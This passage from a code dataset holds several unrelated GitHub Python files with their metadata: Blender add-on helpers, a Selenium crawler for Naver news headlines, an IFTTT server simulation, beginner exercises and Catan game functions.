get_widgets_filepath():\n addon_dir = pathlib.Path(addon_directory)\n widget_file = pathlib.Path(\"{}/Widgets/Widget.blend\".format(addon_dir))\n\n return widget_file\n\ndef get_bone_shape_directory():\n addon_dir = addon_directory\n bone_shapes_directory = os.path.join(addon_dir, \"Widgets\")\n return bone_shapes_directory\n\n\npreview_collections = {}\n\ndef 
get_bone_shape_catagories():\n\n\n pcoll = bpy.utils.previews.new()\n pcoll.my_previews = ()\n preview_collections[\"main\"] = pcoll\n\n\n bone_shapes_directory = get_bone_shape_directory()\n bone_shapes_catagories = {}\n\n for dir in os.listdir(bone_shapes_directory):\n catagory_path = os.path.join(bone_shapes_directory, dir)\n\n if os.path.isdir(catagory_path):\n bone_shapes = []\n\n for bone_shape_name in os.listdir(catagory_path):\n\n bone_shape_path = os.path.join(catagory_path, bone_shape_name)\n\n if os.path.isfile(bone_shape_path) and bone_shape_path.endswith(\".blend\"):\n\n thumb = pcoll.load(bone_shape_path, bone_shape_path, \"BLEND\")\n\n bone_shape = {\"name\": bone_shape_name, \"path\": bone_shape_path, \"thumb\": thumb}\n bone_shapes.append(bone_shape)\n\n bone_shapes_catagory = {\"name\": dir, \"path\": catagory_path, \"bone_shapes\": bone_shapes}\n bone_shapes_catagories[dir] = bone_shapes_catagory\n\n return bone_shapes_catagories\n\ndef Format_String(Format, Dictionary):\n\n for key, item in Dictionary.items():\n Format = Format.replace(key, item)\n\n return Format\n\n\n\ndef subdivide_bone(object, bone, amount):\n\n edit_bones = object.data.edit_bones\n\n twist_bones = []\n\n for a in range(amount):\n newbone_name = \"TWIST_\" + str(a) + \"_\" + bone.name\n newbone = create_bone(object, newbone_name, bone.head, bone.tail, bone.use_deform, Flip_Bone = False)\n newbone.roll = bone.roll\n\n vector = bone.vector\n\n newbone.length = newbone.length / amount\n newbone.head += bone.vector/amount * a\n newbone.tail += bone.vector/amount * a\n\n if len(twist_bones) > 0:\n newbone.parent = twist_bones[-1]\n\n twist_bones.append(newbone)\n\n return twist_bones\n\ndef get_bone_layers(layer):\n layers = [False for layer in range(32)]\n layers[layer] = True\n return layers\n","repo_name":"BlenderBoi/Bonera","sub_path":"Utility_Functions.py","file_name":"Utility_Functions.py","file_ext":"py","file_size_in_byte":15166,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"40450662881","text":"# Selenium\r\n# pip install selenium\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\n\r\nurl = \"https://www.naver.com/\"\r\n\r\ndriver = webdriver.Chrome() # Selenium 사용시 드라이버 생성\r\n\r\n# 페이지 접근\r\ndriver.get(url)\r\n\r\n# 페이지 정지(설정을 해놓지 않으면 켜지고 바로 꺼진다.)\r\ntime.sleep(1)\r\n\r\n# 검색어 창에 자동으로 '인공지능' text 입력하기(find_element-하나만 찾기, find_elements-여러개 찾기:리스트로 반환)\r\n# 검색창 element : <input id=\"query\" name=\"query\" type=\"search\" title=\"검색어를 입력해 주세요.\" placeholder=\"검색어를 입력해 주세요.\" maxlength=\"255\" autocomplete=\"off\" class=\"search_input\" data-atcmp-element=\"\">\r\n# driver.find_element(By.ID, \"query\").send_keys(\"인공지능\")\r\n# driver.find_element(By.CLASS_NAME, \"search_input\").send_keys(\"한국\")\r\n# driver.find_element(By.CSS_SELECTOR, '[placeholder=\"검색어를 입력해 주세요.\"]').send_keys(\"미국\")\r\ndriver.find_element(By.XPATH, '//*[@id=\"query\"]').send_keys('인공지능')\r\ntime.sleep(2)\r\n\r\n# 검색버튼 클릭하기 \r\n# 검색버튼 element : <button type=\"submit\" class=\"btn_search\" onclick=\"window.nclk_v2(this,"sch.action")\"> <span id=\"search-btn\" class=\"ico_btn_search\"></span> <span class=\"blind\">검색</span> </button>\r\n# driver.find_element(By.CLASS_NAME, 'btn_search').click()\r\n\r\n# 검색창에 입력 후 엔터\r\ndriver.find_element(By.XPATH, '//*[@id=\"query\"]').send_keys(Keys.ENTER)\r\ntime.sleep(2)\r\n\r\n# 뉴스 탭 
클릭하기\r\ndriver.find_element(By.XPATH, '//*[@id=\"lnb\"]/div[1]/div/ul/li[4]/a').click()\r\ntime.sleep(2)\r\n\r\n# 페이지 긁어오기(동일한 작업이므로 함수로 만들기)\r\ndef get_page_news_title():\r\n # 뉴스 제목 crawling하기 (HTML 코드 가져오기)\r\n html = driver.page_source\r\n soup = BeautifulSoup(html, 'html.parser')\r\n # 뉴스 타이틀 리스트 찾기\r\n # <a href=\"http://www.newsis.com/view/?id=NISX20230613_0002336220&cID=10802&pID=14000\" class=\"news_tit\" target=\"_blank\" onclick=\"return goOtherCR(this, 'a=nws*a.tit&r=1&i=88000127_000000000000000011909352&g=003.0011909352&u='+urlencode(this.href));\" title=\"인천시, 초거대 인공지능과 지역특화산업 연계 모색\">인천시, 초거대 <mark>인공지능</mark>과 지역특화산업 연계 모색</a>\r\n # <a href=\"https://www.yna.co.kr/view/AKR20230612058200003?input=1195m\" class=\"news_tit\" target=\"_blank\" onclick=\"return goOtherCR(this, 'a=nws*a.tit&r=6&i=880000D8_000000000000000013995919&g=001.0013995919&u='+urlencode(this.href));\" title=\"포스코이앤씨, 건설업계 최초 'AI+' 인공지능 인증 획득\">포스코이앤씨, 건설업계 최초 'AI+' <mark>인공지능</mark> 인증 획득</a>\r\n news = soup.find_all('li', class_=\"bx\")\r\n for n in news:\r\n title = n.find('a', class_='news_tit')\r\n if title is not None:\r\n result = title.get_text()\r\n print(result)\r\n\r\n# 다음 페이지 이동(함수 생성)\r\ndef click_next_btn():\r\n # <a href=\"?where=news&sm=tab_pge&query=%EC%9D%B8%EA%B3%B5%EC%A7%80%EB%8A%A5&sort=0&photo=0&field=0&pd=0&ds=&de=&cluster_rank=23&mynews=0&office_type=0&office_section_code=0&news_office_checked=&nso=so:r,p:all,a:all&start=11\" role=\"button\" class=\"btn_next\" aria-disabled=\"false\" onclick=\"return goOtherCR(this, 'a=nws.paging&r=2&u='+urlencode(urlexpand(this.href)));\"><i class=\"spnew ico_page_arr\">다음</i></a>\r\n driver.find_element(By.CLASS_NAME, \"btn_next\").click()\r\n time.sleep(2)\r\n\r\n# 10번 반복하기\r\nfor i in range(10):\r\n get_page_news_title()\r\n click_next_btn()","repo_name":"Kimjong127/Python-Advanced","sub_path":"Crawling/crawl4.py","file_name":"crawl4.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18833849698","text":"import random\nimport statistics as stat\nfrom typing import List, Callable, Tuple, Union\n\nimport simpy\n\nimport IFTTTModel.model as model\nfrom IFTTTModel.model import DAYS, HOURS, MINUTES, SECONDS\nimport IFTTTModel.visualization as vis\n\n\nclass Simulation:\n\n def __init__(self,\n num_users: int = 15000,\n mean_num_devices_per_user: int = 10,\n user_interaction_mean: float = 20,\n sim_length_days: int = 3 * DAYS + 1 * MINUTES,\n server_capacity: int = 30,\n server_response_mean: float = 1 * SECONDS,\n signal_slowness: float = 0.01 * SECONDS,\n num_servers: int = 3,\n boundary_side_length: float = 100,\n ):\n # print('Creating Simulations')\n self.num_users = num_users\n self.mean_num_devices_per_user = mean_num_devices_per_user\n self.stdv_num_devices_per_user = mean_num_devices_per_user * 0.2\n\n self.sim_length_days = sim_length_days\n\n self.user_interaction_mean = user_interaction_mean\n self.user_interaction_stdv = user_interaction_mean * 0.2\n\n self.server_capacity = server_capacity\n self.server_response_mean = server_response_mean\n self.server_response_stdv = server_response_mean * 0.2\n\n model.time_to_distance_ratio = signal_slowness\n\n self.num_servers = num_servers\n\n self.boundary_side_length = boundary_side_length\n\n self.users: List[model.User] = []\n self.servers: List[model.Server] = []\n\n self.has_run = False\n self.env = simpy.Environment()\n\n self.build_sim()\n\n def _get_position(self) -> Tuple[float, 
float]:\n return self.boundary_side_length * random.random(), self.boundary_side_length * random.random()\n\n def build_sim(self):\n\n for _ in range(self.num_servers):\n server_location = self._get_position()\n self.servers.append(model.Server(self.env, server_location, self.server_capacity,\n self.server_response_mean, self.server_response_stdv))\n\n # print('Creating users')\n for _ in range(self.num_users):\n user = model.User(self.env, self.user_interaction_mean, self.user_interaction_stdv)\n location = self._get_position()\n for _ in range(self._get_num_devices_for_user()):\n controller = model.SimpleController(self.env, location)\n device = model.ToggleDevice(self.env, location)\n steps = random.randint(1, self.num_servers)\n pipeline: List[Union[model.CommunicatingDevice, model.Server]] = random.sample(self.servers, steps)\n pipeline.insert(0, controller)\n pipeline.append(device)\n for i in range(1, len(pipeline) - 1):\n pipeline[i].register_connection(pipeline[i - 1], pipeline[i + 1])\n user.add_device_with_manual_controller(device, controller)\n\n self.users.append(user)\n self.env.process(user.run())\n\n def _get_num_devices_for_user(self) -> int:\n num_devices = 0\n while num_devices == 0:\n num_devices = round(random.normalvariate(self.mean_num_devices_per_user, self.stdv_num_devices_per_user))\n return num_devices\n\n def _post_simulation(fun: Callable):\n def new_method(self: 'Simulation', *args, **kwargs):\n if not self.has_run:\n raise Exception('Simulation must be run first!')\n return fun(self, *args, **kwargs)\n\n return new_method\n\n def run(self):\n if self.has_run:\n return # Only allow one run\n\n def progress_report(env: simpy.Environment):\n while True:\n yield env.timeout(1 * DAYS)\n print(f'Finished day {progress_report.day_number} of {int(self.sim_length_days / DAYS)}')\n progress_report.day_number += 1\n\n progress_report.day_number = 1\n\n def minute_report(env: simpy.Environment):\n while True:\n yield env.timeout(1 * SECONDS)\n print(f'Minute {divmod(env.now, DAYS)[1]}')\n\n # print('Starting Simulation')\n self.env.process(progress_report(self.env))\n self.env.process(minute_report(self.env))\n self.env.run(until=self.sim_length_days)\n self.has_run = True\n\n @_post_simulation\n def view_wait_times(self) -> None:\n vis.view_wait_times(self.users)\n\n def view_positions(self):\n vis.show_geographical_distribution(self.servers, self.users)\n\n def view_load_over_time(self):\n vis.show_loads_over_time(self.servers)\n\n @_post_simulation\n def get_max_and_mean_wait(self):\n # print('returning max and mean')\n wait_times = []\n for user in self.users:\n wait_times.extend([i for _, i in user.wait_times])\n max_wait = max(wait_times)\n mean_wait = stat.mean(wait_times)\n return max_wait, mean_wait\n\n\nif __name__ == '__main__':\n sim = Simulation(num_users=1)\n sim.run()\n print(sim.get_max_and_mean_wait())\n sim.view_load_over_time()\n sim.view_wait_times()\n","repo_name":"ZachClayburn/578FinalProject","sub_path":"IFTTTModel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2796823070","text":"# Final Exam, Part 3 (N letter dictionary)\n# 0.0/20.0 puntos (calificados)\n# Write a function named n_letter_dictionary that receives a string (words separated by spaces) as parameter and returns a dictionary whose keys are numbers and whose values are lists that contain unique words that have the number of letters equal to the 
keys. \n#\n# For example, when your function is called as:\n#\n# n_letter_dictionary(\"The way you see people is the way you treat them and the Way you treat them is what they become\")\n# Then, your function should return a dictionary such as\n# {2: ['is'], 3: ['and', 'see', 'the', 'way', 'you'], 4: ['them', 'they', 'what'], 5: ['treat'], 6: ['become', 'people']}\n# Notes:\n# Each list of words with the same number of letters should be sorted in ascending order\n# The words in a list should be unique. For example, even though the word \"them\" is repeated twice in the above sentence, it is only considered once in the list of four letter words.\n# Capitalization does not matter, this means that all the words should be converted to lower case. For example the words \"The\" and \"the\" appear in the sentence but they are both considered as lower case \"the\".\n# Do NOT import any module for solving this problem.\n#\ndef n_letter_dictionary(string):\n    my_dictionary={}\n    string=string.lower()\n    string=string.split(' ')\n    lista_unica=[]\n    #removing duplicate words\n    for words in string:\n        if words not in lista_unica:\n            lista_unica.append(words)\n    #sorting numerically by number of letters\n    #up to 15 characters per word\n    for k in range(1,15):\n        lista_palabras=[]\n        n_letter_words=0\n        for word in lista_unica:\n            #k is the number of characters per word\n            if len(word)==k:\n                n_letter_words=n_letter_words+1\n                lista_palabras.append(word)\n        if lista_palabras!=[]:\n            lista_palabras.sort()\n            my_dictionary[k] = lista_palabras\n    return my_dictionary\n\n# NOTE: SUBMIT ONLY THE FUNCTION!!! \n# Main\nstring = \"I loved a girl once\"\n\nevalua_n_letter_dictionary = n_letter_dictionary(string)\nprint(evalua_n_letter_dictionary)","repo_name":"ivanromanv/manuales","sub_path":"Python/Edx_Course/Introduction to Programming Using Python/Excercises/FinalExam_P3_Function_diccionario_n_letras.py","file_name":"FinalExam_P3_Function_diccionario_n_letras.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22428120187","text":"\"\"\"\nCalculation of agreement between different classification\napproaches.\n\"\"\"\n\ndomain = [10, 24, -61, -40] # domain of original data [lat1, lat2, lon1, lon2]\nlat0, lat1, lon0, lon1 = [10, 20, -58, -48]\nlabel_map= {'Sugar':0, 'Fish': 3, 'Flowers': 2, 'Flower': 2, 'Gravel': 1}\nlabel_map_rv = {0:'Sugar', 1:'Gravel', 2: 'Flowers', 3: 'Fish'}\ncolor_dict = {'Sugar':'#A1D791','Fish':'#2281BB','Gravel':'#3EAE47', 'Flowers': '#93D2E2'}\n\nfn_ABI_IR = '../auxiliary_data/GOES16_CH13_classifications_EUREC4A_30min.zarr/'\nfiles_manualClassifications_l3 = {\n    \"manualVIS\": '../processed_data/EUREC4A_ManualClassifications_l3_VIS_instant.zarr',\n    \"manualIR\": '../processed_data/EUREC4A_ManualClassifications_l3_IR_instant.zarr',\n    \"manualICON\": '../processed_data/EUREC4A_ManualClassifications_l3_albedo_instant.zarr' \n}\nfn_iorg = '../auxiliary_data/GOES16_IR_nc_Iorg_EUREC4A_10-20_-58--48.nc'\n\nimport tqdm\nimport dask\nimport zarr\nimport xarray as xr\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Circle, Wedge, Polygon\nfrom matplotlib.collections import PatchCollection\nimport datetime as dt\nimport pandas as pd\n\nimport sys, os\nsys.path.append(\"/home/mpim/m300408/CloudClassification/sugar-flower-fish-or-gravel\")\nsys.path.remove(os.path.abspath(os.path.dirname(sys.argv[0])))\nfrom pyclouds.imports import *\nfrom pyclouds.helpers import *\nfrom 
pyclouds.zooniverse import *\nfrom pyclouds.plot import *\n\nimport pyclouds\nprint(pyclouds.__file__)\n\ndel tqdm\nimport tqdm\n\nsys.path.append(\"../notebooks/\")\nimport glob\nfrom agreement_helpers import *\n\nimport argparse\nimport logging\n\nlogging.info(f\"pandas version: {pd.__version__}\")\n\ndef get_args():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('-t', '--threshold', help='Agreement threshold', required=False, default=0.1)\n\n args = vars(parser.parse_args())\n\n return args\n\n\nargs = get_args()\nfrequency_threshold = float(args[\"threshold\"])\n\n### Open neural network classifications\nmask_ABI_IR = xr.open_zarr(fn_ABI_IR)\n\nfor workflow, l3_file in sorted(files_manualClassifications_l3.items()):\n ### Open manual classifications\n if '.zarr' in l3_file:\n mask_manual_classifications = xr.open_zarr(l3_file)\n elif '.nc' in l3_file:\n mask_manual_classifications = xr.open_dataset(l3_file)\n else:\n logging.error('File format not supported')\n \n # find common times\n time_set_A = set(mask_ABI_IR.time.dt.floor(freq='1T').values)\n time_set_B = set(mask_manual_classifications.date.values)\n common_dates = np.array([*time_set_A.intersection(time_set_B)])\n times_of_interest = sorted(np.unique(common_dates))\n\n time_mask_ABIIR = np.in1d(mask_ABI_IR.time.dt.floor(freq='1T').values,common_dates)\n\n mask_ABI_IR_timesel = mask_ABI_IR.sel(time=time_mask_ABIIR)\n mask_ABI_IR_timesel['date'] = mask_ABI_IR_timesel.time.dt.floor(freq='1T')\n\n mask_manual_timesel = mask_manual_classifications.sel(date=common_dates)\n\n results = {}\n\n logging.info(\"Find common times to all datasets\")\n sizes_calculated = False\n\n for ii, i in enumerate(tqdm.tqdm(range(len(times_of_interest)))):\n mask_ABI_IR_timestep = mask_ABI_IR_timesel.where(mask_ABI_IR_timesel.date == times_of_interest[i], drop=True)\n mask_manual_timestep = mask_manual_timesel.sel(date=times_of_interest[i])\n\n\n\n mask_ABI_IR_timestep = mask_ABI_IR_timestep.sel(latitude=slice(lat1, lat0),longitude=slice(lon0, lon1))\n mask_manual_timestep = mask_manual_timestep.sel(latitude=slice(lat1, lat0),longitude=slice(lon0, lon1))\n\n if sizes_calculated is False:\n size_ABI = len(mask_ABI_IR_timestep.latitude)*len(mask_ABI_IR_timestep.longitude)\n size_manual = len(mask_manual_timestep.latitude)*len(mask_manual_timestep.longitude)\n sizes_calculated = True\n\n pattern_results = {}\n\n for p, pattern in enumerate(['Sugar', 'Gravel', 'Flowers', 'Fish']):\n pattern_results[pattern] = {}\n if pattern != 'Unclassified':\n # there is no unclassified category in the neural network classifications\n arr_ABI = mask_ABI_IR_timestep.mask.sel(pattern=pattern)\n merged_mask_ABI = merge_mask(arr_ABI)\n merged_mask_ABI = merged_mask_ABI.fillna(False).astype(bool).load()\n pattern_results[pattern][\"area_fraction_ABI\"] = np.count_nonzero(merged_mask_ABI)/size_ABI\n\n if p == 0:\n total_classification_mask_ABI = merged_mask_ABI\n else:\n total_classification_mask_ABI += merged_mask_ABI\n\n arr_manual = mask_manual_timestep.freq.sel(pattern=pattern)\n merged_mask_manual = arr_manual > frequency_threshold\n merged_mask_manual = merged_mask_manual.load()\n pattern_results[pattern][f\"area_fraction_{workflow}\"] = np.count_nonzero(merged_mask_manual)/size_manual\n\n if p == 0:\n total_classification_mask = merged_mask_manual\n else:\n total_classification_mask += merged_mask_manual\n\n if pattern != 'Unclassified':\n iou_ABI_Manual = iou_one_class_from_annos(merged_mask_ABI.values,\n merged_mask_manual.values,\n 
return_iou = True)\n\n pattern_results[pattern][f\"iou_ABI_{workflow}\"] = iou_ABI_Manual\n pattern_results[pattern][f\"missing_ABI_{workflow}\"] = identify_where_class_missing(merged_mask_ABI,\n merged_mask_manual)\n\n pattern_results['Unclassified'] = {f\"area_fraction_{workflow}\":np.count_nonzero(~total_classification_mask)/size_manual,\n \"area_fraction_ABI\":np.count_nonzero(~total_classification_mask_ABI)/size_manual\n }\n results[times_of_interest[i]] = pattern_results\n df = pd.DataFrame.from_dict(results, orient='index')\n output_folder = f'../temporary_data/agreement_threshold{frequency_threshold}'\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n df.to_pickle(output_folder+f'/agreement_results_ABI-IR_vs_{workflow}.pkl')\n","repo_name":"observingClouds/C3ONTEXT","sub_path":"scripts/calculate_agreement.py","file_name":"calculate_agreement.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"5913986830","text":"\"\"\"\n 16 - Faça um programa para uma loja de tintas. O programa deverá pedir o tamanho em metros quadrados da área a ser pintada.\n Considere que a cobertura da tinta é de 1 litro para cada 3 metros quadrados e que a tinta é vendida em latas de 18 litros, que custam R$ 80,00.\n Informe ao usuário a quantidades de latas de tinta a serem compradas e o preço total.\n\"\"\"\n#import math\n\narea = int(input(\"Digite quantos metros quadrados tem a àrea a ser pintada:\"))\n\nlitroTintaUsada = area/3\n\n#latas = math.ceil(litroTintaUsada/18)\n\n\n\nlatas = 0\nif litroTintaUsada % 18 == 0:\n latas = litroTintaUsada/18\nelse:\n latas = int(litroTintaUsada/18) + 1\n\n\n\"\"\"\ncompletar = (litroTintaUsada/18)\n\ncomp = ( completar * 100)\n\nresto = 10 - comp\n\nlatas = (resto/10) + (comp/10)\n\n\n\n\"\"\"\ntotal = latas * 80.00\n\nprint(\"Será necessário comprar \",latas,\"(s) Dando um total de R$\",total)","repo_name":"RafaelMuniz94/Primeiros-Passos","sub_path":"Exercicios/Exercicio16.py","file_name":"Exercicio16.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22644581792","text":"import os\nfrom datetime import date\nimport pandas as pd\nimport json\nfrom jinja2 import Markup\nimport uuid\nfrom flask import request, render_template\nfrom flask_admin.model import typefmt\nfrom flask_admin.contrib.sqla import ModelView\nfrom flask_admin.form.upload import FileUploadField\nfrom wtforms import PasswordField\nfrom wtforms.validators import DataRequired\nfrom KashTable.models import AVAILABLE_USER_TYPES\nfrom KashTable import bcrypt\nfrom KashTable.config import Config\nfrom KashTable.posts import utils\n\n\n# Create directory for file fields to use\nfile_path = Config.FILE_PATH + '/archive'\n\ntry:\n os.mkdir(file_path)\nexcept OSError:\n pass\n\n\nclass CustomPasswordField(PasswordField): \n \n def populate_obj(self, obj, name):\n setattr(obj, name, bcrypt.generate_password_hash(self.data).decode('utf-8'))\n\n\nclass UserCRUD(ModelView):\n \n list_template = 'admin/my_clients.html'\n page_size = 100\n can_set_page_size = True\n can_view_details = True\n can_export = True\n export_types = ['csv', 'xls']\n form_choices = {\n 'type': AVAILABLE_USER_TYPES,\n }\n form_widget_args = {\n 'id': {\n 'readonly': True\n }\n }\n column_list = [\n 'activated',\n 'type',\n 'bundle',\n 'company_name',\n 'email',\n 'phone_number',\n ]\n column_searchable_list = [\n 
'company_name',\n 'email', \n ]\n column_editable_list = [\n 'type', \n 'bundle', \n 'activated'\n ]\n column_details_list = [\n 'id',\n 'activated',\n 'type',\n 'bundle',\n 'company_name',\n 'first_name',\n 'last_name',\n 'email',\n 'phone_number', \n 'street',\n 'postcode',\n 'city',\n 'country',\n 'siren',\n 'password'\n\n ]\n form_columns = [\n 'id',\n 'type',\n 'last_name',\n 'first_name',\n 'email',\n 'company_name',\n 'street',\n 'postcode',\n 'city',\n 'country',\n 'siren', \n 'phone_number',\n 'bundle',\n 'activated',\n 'password'\n ]\n form_create_rules = [\n 'type',\n 'last_name',\n 'first_name',\n 'email',\n 'company_name',\n 'street',\n 'postcode',\n 'city',\n 'country',\n 'siren', \n 'phone_number',\n 'bundle',\n 'activated',\n 'password'\n ]\n\n column_auto_select_related = True\n column_default_sort = [('type', False), ('company_name', False)] # sort on multiple columns\n\n # custom filter: each filter in the list is a filter operation (equals, not equals, etc)\n # filters with the same name will appear as operations under the same filter\n column_filters = [\n 'type',\n 'last_name',\n 'first_name',\n 'email',\n 'company_name',\n 'street',\n 'postcode',\n 'city',\n 'country',\n 'siren', \n 'phone_number',\n 'bundle',\n 'activated',\n ]\n\n form_extra_fields = {\n 'password': CustomPasswordField('Password')\n }\n \n\nclass FileCRUD(ModelView):\n \n def _date_format(view, value):\n return value.strftime('%B %Y')\n\n def _json_formatter(view, context, model, name):\n \"\"\"Format model.doc as it is extracted in route posts.table in order to\n give realistic reprensentation of the client side\"\"\"\n value = getattr(model, name)\n df = pd.json_normalize(value)\n # split tables into different tabs\n list_tables = list(df['table_name'].drop_duplicates())\n items = {}\n for table_name in list_tables: \n frame = df.loc[df['table_name'] == table_name]\n # dict table_name as key, tuple (id, rendered html tables)\n items.update( {table_name: ( uuid.uuid4(), utils.table(frame).financials() )} )\n return Markup(render_template('admin/details.html', items=items))\n\n def on_model_change(self, form, model, is_created=False):\n file = request.get_array(field_name='doc')\n df = pd.DataFrame(file)\n # convert first row to column header\n df = df.rename(columns=df.iloc[0]).drop(df.index[0])\n df = df.apply( pd.to_numeric, errors='ignore')\n # load to db\n model.doc = json.loads(df.to_json(orient='records', date_format='iso'))\n\n\n list_template = 'admin/my_files.html' \n MY_DEFAULT_FORMATTERS = dict(typefmt.BASE_FORMATTERS)\n MY_DEFAULT_FORMATTERS.update({\n date: _date_format \n }) \n column_type_formatters = MY_DEFAULT_FORMATTERS\n form_args = dict(\n time = dict(validators=[DataRequired()],format='%B %Y')\n )\n form_widget_args = dict(\n time={'data-date-format': u'%B %Y'} \n )\n page_size = 100\n can_set_page_size = True\n can_view_details = True\n can_edit = False\n column_list = [\n 'user', \n 'name', \n 'date', \n ]\n column_details_list = [\n 'id',\n 'user',\n 'name',\n 'date',\n 'doc' \n ]\n form_columns = [\n 'user', \n 'name',\n 'date',\n 'doc',\n ]\n column_default_sort = [\n ('user.company_name', False), \n ('user.email', False), \n ('date', True)\n ]\n can_export = True\n export_types = ['csv', 'xls']\n column_sortable_list = [\n ('user', ('user.company_name', 'user.email')), # sort on multiple columns\n 'name', \n 'date',\n ]\n column_searchable_list = [\n 'user.company_name',\n 'user.email',\n 'name',\n 'date'\n ]\n column_filters = [\n 'user.company_name',\n 'user.email',\n 
'name', \n 'date',\n ]\n column_formatters = {\n 'doc': _json_formatter,\n } \n form_overrides = {\n 'doc': FileUploadField\n }\n # Pass additional parameters to 'path' to FileUploadField constructor\n form_args = {\n 'doc': {\n 'label': 'Doc',\n 'base_path': file_path,\n 'allow_overwrite': True\n }\n }","repo_name":"ActurialCapital/kashtable","sub_path":"KashTable/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31333354339","text":"from random import randrange\nfrom math import sqrt\n\n#valeur absolue\ndef abs (x):\n if x<0:\n return -x\n else: \n return x\n\n#Retourne faux s'il existe dans sommets un sommets quasiment identique à sommet\ndef not_in_keys_sommet(sommet, sommets):\n for i in sommets.keys():\n if abs(sommet[0]-i[0]) < 10 and abs(sommet[1]-i[1]) < 10:\n return False\n return True\n\ndef not_in_keys_route(route, routes):\n\tfor i in routes.keys():\n\t\tif (abs(route[0][0]-i[0][0]) < 10 and abs(route[0][1]-i[0][1]) < 10 and abs(route[1][0]-i[1][0]) < 10 and abs(route[1][1]-i[1][1]) < 10) or (abs(route[1][0]-i[0][0]) < 10 and abs(route[1][1]-i[0][1]) < 10 and abs(route[0][0]-i[1][0]) < 10 and abs(route[0][1]-i[1][1]) < 10):\n\t\t\treturn False\n\treturn True\n\n\ndef Roll_dices():\n dice1=randrange(1,7)\n dice2=randrange(1,7)\n return dice1+dice2\n\n\ndef placer_colonie(Plateau, coord):\n Plateau.Sommets[coord].batiment='Colonie'\n Plateau.Sommets[coord].Joueur=Plateau.Joueur_en_cours\n if Plateau.Premier_Tour==False:\n Plateau.Joueur_en_cours.Bois-=1\n Plateau.Joueur_en_cours.Blé-=1\n Plateau.Joueur_en_cours.Argile-=1\n Plateau.Joueur_en_cours.Monton-=1\n\n\ndef placer_ville(Plateau, coord):\n Plateau.Sommets[coord].batiment='Ville'\n Plateau.Sommets[coord].Joueur=Plateau.Joueur_en_cours\n if Plateau.Premier_Tour==False:\n Plateau.Joueur_en_cours.Blé-=2\n Plateau.Joueur_en_cours.Roche-=3\n \ndef placer_route(Plateau, coord):\n Plateau.Routes[coord].Joueur=Plateau.Joueur_en_cours\n if Plateau.Premier_Tour==False:\n Plateau.Joueur_en_cours.Bois-=1\n Plateau.Joueur_en_cours.Argile-=1\n\n\ndef fct_Premier_Tour(Plateau):\n dices_results={}\n for i in range(Plateau.Nbrjoueur):\n #attendre lancer de dé joueur \n lancer=Roll_dices()\n while lancer in dices_results.keys():\n lancer=Roll_dices()\n dices_results[lancer]=Plateau.Joueurs[i]\n\n print (dices_results)\n sorted_results=sorted(dices_results,reverse=True)+sorted(dices_results)\n print (sorted_results)\n\n ordre=[]\n for result in sorted_results:\n cpt=0\n for cle in dices_results.keys():\n if cle==result:\n if cpt==0:\n ordre+=[dices_results[cle]]\n cpt=1\n print (ordre)\n #Plateau.can.create_text(200,200,text='salut')\n\n \n for player in ordre:\n Plateau.can.bind(\"<Button>\", lambda event : trouver_sommet(event, Plateau))\n\n \n\n\n\n\ndef get_Nbjoueur(NbJoueur):\n Nb_Joueur=NbJoueur.get()\n print (Nb_Joueur)\n return\n\n\n\n\n\n\n\ndef trouver_case (self, event):\n x, y = event.x, event.y\n for hex in self.hexagons:\n if hex.sommet_1[0]<x<hex.sommet_2[0] and hex.sommet_1[1]<y<hex.sommet_5[1]:\n print(hex.coords)\n return hex.coords\n\n\n\n\ndef trouver_sommet (event,Plateau):\n x, y = event.x, event.y\n size = (1/2) * 85 * sqrt(3) / 2\n for sommet in Plateau.sommets:\n if sommet[0]-size < x < sommet[0]+size and sommet[1]-size < y < sommet[1]+size:\n print (sommet)\n return sommet\n\n\n\n 
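# Usage sketch (the \"plateau\" instance here is hypothetical, not defined in\n# this file): binding the board's Tkinter canvas makes each click run the\n# vertex hit-test above, e.g.\n#     plateau.can.bind(\"<Button>\", lambda event: trouver_sommet(event, plateau))\n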
\n","repo_name":"guillaumegut/Catan","sub_path":"Fonctions.py","file_name":"Fonctions.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19868380747","text":"import sys\ninput = lambda : sys.stdin.readline().rstrip('\\r\\n')\nimport heapq\n\nN, M = map(int, input().split())\ncnt = [0] * (N+1)\narr = [[] for _ in range(N+1)]\nqueue = []\nfor _ in range(M): #먼저푸는게 좋은 문제 정보\n first, second = map(int, input().split())\n arr[first].append(second)\n cnt[second] +=1\n\nfor i in range(1,N+1):\n if cnt[i] == 0:\n heapq.heappush(queue,i)\n\nwhile queue:\n problem = heapq.heappop(queue)\n print(problem, end=' ')\n for i in arr[problem]:\n if cnt[i] > 0:\n cnt[i] -= 1\n if cnt[i] == 0:\n heapq.heappush(queue,i)\n\n\n\n\n","repo_name":"cocorig/challenge100-codingtest-study","sub_path":"wlwl1011/BOJ/heybob/2회/1766.py","file_name":"1766.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"30413452","text":"from flask import Flask, render_template\nfrom flask_socketio import SocketIO, emit\nimport random\nimport time\n\napp = 